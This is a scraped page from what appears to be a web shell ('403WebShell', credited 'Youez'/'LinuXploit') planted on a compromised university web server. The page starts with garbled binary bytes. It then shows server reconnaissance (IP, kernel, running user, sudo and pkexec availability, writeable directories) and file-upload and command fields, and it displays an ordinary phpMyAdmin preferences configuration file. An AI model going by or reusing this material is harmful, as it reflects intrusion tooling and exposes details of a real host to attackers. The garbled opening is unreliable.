h(  ) ($6;EbBLkfu�_l� ''8;DUFKV3Dd#,?ANk&5G$/(5M\^�ms����Sb�,;R''6c2I�!\����kx�Ve�[i��Me�IYO7:nOL~�Kr�qrv�I:�BM�y��s}r��K����x)1�6@r*2�89ma��&��'ti������{~#������t)1�2<�0:^5�W.uFzQ/u}�v��vv�u��U37yDJeEJo(/�5Ds'1�:Jlu�iy�iy�hw�1;:S`^BMLOQQn,4�7C�8C�>Lfe�]k�[i�Zg��IW�LZ�EP;,.��Tc�q(0) G,/]/1����w�r��l&-t*3�<<�u��#����j&.u��J68\8?"#$%&'()*+,-./0 ! 
Notice: Undefined index: dl in /var/www/html/web/simple.mini.php on line 1
403WebShell
403Webshell
Server IP : 10.254.12.21  /  Your IP : 10.254.12.21
Web Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
System : Linux arit.skru.ac.th 3.10.0-1160.76.1.el7.x86_64 #1 SMP Wed Aug 10 16:21:17 UTC 2022 x86_64
User : apache ( 48)
PHP Version : 5.6.40
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /usr/share/phpMyAdmin/libraries/config/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/share/phpMyAdmin/libraries/config/user_preferences.forms.php
<?php
/* vim: set expandtab sw=4 ts=4 sts=4: */
/**
 * List of available forms, each form is described as an array of fields to display.
 * Fields MUST have their counterparts in the $cfg array.
 *
 * To define form field, use the notation below:
 * $forms['Form group']['Form name'] = array('Option/path');
 *
 * You can assign default values set by special button ("set value: ..."), eg.:
 * 'Servers/1/pmadb' => 'phpmyadmin'
 *
 * To group options, use:
 * ':group:' . __('group name') // just define a group
 * or
 * 'option' => ':group' // group starting from this option
 * End group blocks with:
 * ':group:end'
 *
 * @package PhpMyAdmin
 */

$forms = array();
$forms['Features']['General'] = array(
    'VersionCheck',
    'NaturalOrder',
    'InitialSlidersState',
    'LoginCookieValidity',
    'Servers/1/only_db', // saves to Server/only_db
    'Servers/1/hide_db', // saves to Server/hide_db
    'SkipLockedTables',
    'DisableMultiTableMaintenance',
    'MaxDbList',
    'MaxTableList',
    'ShowHint',
    'SendErrorReports'
);
$forms['Features']['Text_fields'] = array(
    'CharEditing',
    'MinSizeForInputField',
    'MaxSizeForInputField',
    'CharTextareaCols',
    'CharTextareaRows',
    'TextareaCols',
    'TextareaRows',
    'LongtextDoubleTextarea');
$forms['Features']['Page_titles'] = array(
    'TitleDefault',
    'TitleTable',
    'TitleDatabase',
    'TitleServer');
$forms['Features']['Warnings'] = array(
    'ServerLibraryDifference_DisableWarning',
    'PmaNoRelation_DisableWarning',
    'SuhosinDisableWarning',
    'LoginCookieValidityDisableWarning',
    'ReservedWordDisableWarning');
// settings from this form are treated specially,
// see prefs_forms.php and user_preferences.lib.php
$forms['Features']['Developer'] = array(
    'DBG/sql');
$forms['Sql_queries']['Sql_queries'] = array(
    'ShowSQL',
    'Confirm',
    'QueryHistoryMax',
    'IgnoreMultiSubmitErrors',
    'MaxCharactersInDisplayedSQL',
    'RetainQueryBox',
    'CodemirrorEnable');
$forms['Sql_queries']['Sql_box'] = array(
    'SQLQuery/Edit',
    'SQLQuery/Explain',
    'SQLQuery/ShowAsPHP',
    'SQLQuery/Refresh');
$forms['Navi_panel']['Navi_panel'] = array(
    'ShowDatabasesNavigationAsTree',
    'NavigationLinkWithMainPanel',
    'NavigationDisplayLogo',
    'NavigationLogoLink',
    'NavigationLogoLinkWindow',
    'NavigationTreePointerEnable',
    'FirstLevelNavigationItems',
    'MaxNavigationItems',
    'NavigationTreeEnableGrouping',
    'NavigationTreeEnableExpansion',
    'NavigationTreeDisplayItemFilterMinimum',
    'NumRecentTables',
    'NumFavoriteTables'
);
$forms['Navi_panel']['Navi_databases'] = array(
    'NavigationTreeDisplayDbFilterMinimum',
    'NavigationTreeDbSeparator');
$forms['Navi_panel']['Navi_tables'] = array(
    'NavigationTreeDefaultTabTable',
    'NavigationTreeDefaultTabTable2',
    'NavigationTreeTableSeparator',
    'NavigationTreeTableLevel',
);
$forms['Main_panel']['Startup'] = array(
    'ShowCreateDb',
    'ShowStats',
    'ShowServerInfo');
$forms['Main_panel']['DbStructure'] = array(
    'ShowDbStructureCreation',
    'ShowDbStructureLastUpdate',
    'ShowDbStructureLastCheck');
$forms['Main_panel']['TableStructure'] = array(
    'HideStructureActions');
$forms['Main_panel']['Browse'] = array(
    'TableNavigationLinksMode',
    'ActionLinksMode',
    'ShowAll',
    'MaxRows',
    'Order',
    'BrowsePointerEnable',
    'BrowseMarkerEnable',
    'GridEditing',
    'SaveCellsAtOnce',
    'RepeatCells',
    'LimitChars',
    'RowActionLinks',
    'TablePrimaryKeyOrder',
    'RememberSorting',
    'RelationalDisplay');
$forms['Main_panel']['Edit'] = array(
    'ProtectBinary',
    'ShowFunctionFields',
    'ShowFieldTypesInDataEditView',
    'InsertRows',
    'ForeignKeyDropdownOrder',
    'ForeignKeyMaxLimit');
$forms['Main_panel']['Tabs'] = array(
    'TabsMode',
    'DefaultTabServer',
    'DefaultTabDatabase',
    'DefaultTabTable');
$forms['Main_panel']['DisplayRelationalSchema'] = array(
    'PDFDefaultPageSize');

$forms['Import']['Import_defaults'] = array(
    'Import/format',
    'Import/charset',
    'Import/allow_interrupt',
    'Import/skip_queries');
$forms['Import']['Sql'] = array(
    'Import/sql_compatibility',
    'Import/sql_no_auto_value_on_zero',
    'Import/sql_read_as_multibytes');
$forms['Import']['Csv'] = array(
    ':group:' . __('CSV'),
        'Import/csv_replace',
        'Import/csv_ignore',
        'Import/csv_terminated',
        'Import/csv_enclosed',
        'Import/csv_escaped',
        'Import/csv_col_names',
        ':group:end',
    ':group:' . __('CSV using LOAD DATA'),
        'Import/ldi_replace',
        'Import/ldi_ignore',
        'Import/ldi_terminated',
        'Import/ldi_enclosed',
        'Import/ldi_escaped',
        'Import/ldi_local_option');
$forms['Import']['Open_Document'] = array(
    ':group:' . __('OpenDocument Spreadsheet'),
        'Import/ods_col_names',
        'Import/ods_empty_rows',
        'Import/ods_recognize_percentages',
        'Import/ods_recognize_currency');
$forms['Export']['Export_defaults'] = array(
    'Export/method',
    ':group:' . __('Quick'),
        'Export/quick_export_onserver',
        'Export/quick_export_onserver_overwrite',
        ':group:end',
    ':group:' . __('Custom'),
        'Export/format',
        'Export/compression',
        'Export/charset',
        'Export/asfile' => ':group',
            'Export/onserver',
            'Export/onserver_overwrite',
            ':group:end',
        'Export/file_template_table',
        'Export/file_template_database',
        'Export/file_template_server');
$forms['Export']['Sql'] = array(
    'Export/sql_include_comments' => ':group',
        'Export/sql_dates',
        'Export/sql_relation',
        'Export/sql_mime',
        ':group:end',
    'Export/sql_use_transaction',
    'Export/sql_disable_fk',
    'Export/sql_views_as_tables',
    'Export/sql_compatibility',
    ':group:' . __('Database export options'),
        'Export/sql_drop_database',
        'Export/sql_structure_or_data',
        ':group:end',
    ':group:' . __('Structure'),
        'Export/sql_drop_table',
        'Export/sql_create_table',
        'Export/sql_create_view',
        'Export/sql_procedure_function',
        'Export/sql_create_trigger',
        'Export/sql_create_table_statements' => ':group',
            'Export/sql_if_not_exists',
            'Export/sql_auto_increment',
            ':group:end',
        'Export/sql_backquotes',
        ':group:end',
    ':group:' . __('Data'),
        'Export/sql_delayed',
        'Export/sql_ignore',
        'Export/sql_type',
        'Export/sql_insert_syntax',
        'Export/sql_max_query_size',
        'Export/sql_hex_for_binary',
        'Export/sql_utc_time');
$forms['Export']['CodeGen'] = array(
    'Export/codegen_format');
$forms['Export']['Csv'] = array(
    ':group:' . __('CSV'),
        'Export/csv_separator',
        'Export/csv_enclosed',
        'Export/csv_escaped',
        'Export/csv_terminated',
        'Export/csv_null',
        'Export/csv_removeCRLF',
        'Export/csv_columns',
        ':group:end',
    ':group:' . __('CSV for MS Excel'),
        'Export/excel_null',
        'Export/excel_removeCRLF',
        'Export/excel_columns',
        'Export/excel_edition');
$forms['Export']['Latex'] = array(
    'Export/latex_caption',
    'Export/latex_structure_or_data',
    ':group:' . __('Structure'),
        'Export/latex_structure_caption',
        'Export/latex_structure_continued_caption',
        'Export/latex_structure_label',
        'Export/latex_relation',
        'Export/latex_comments',
        'Export/latex_mime',
        ':group:end',
    ':group:' . __('Data'),
        'Export/latex_columns',
        'Export/latex_data_caption',
        'Export/latex_data_continued_caption',
        'Export/latex_data_label',
        'Export/latex_null');
$forms['Export']['Microsoft_Office'] = array(
    ':group:' . __('Microsoft Word 2000'),
        'Export/htmlword_structure_or_data',
        'Export/htmlword_null',
        'Export/htmlword_columns');
$forms['Export']['Open_Document'] = array(
    ':group:' . __('OpenDocument Spreadsheet'),
        'Export/ods_columns',
        'Export/ods_null',
        ':group:end',
    ':group:' . __('OpenDocument Text'),
        'Export/odt_structure_or_data',
        ':group:' . __('Structure'),
            'Export/odt_relation',
            'Export/odt_comments',
            'Export/odt_mime',
            ':group:end',
        ':group:' . __('Data'),
            'Export/odt_columns',
            'Export/odt_null');
$forms['Export']['Texy'] = array(
    'Export/texytext_structure_or_data',
    ':group:' . __('Data'),
        'Export/texytext_null',
        'Export/texytext_columns');
?>

Youez - 2016 - github.com/yon3zu
LinuXploit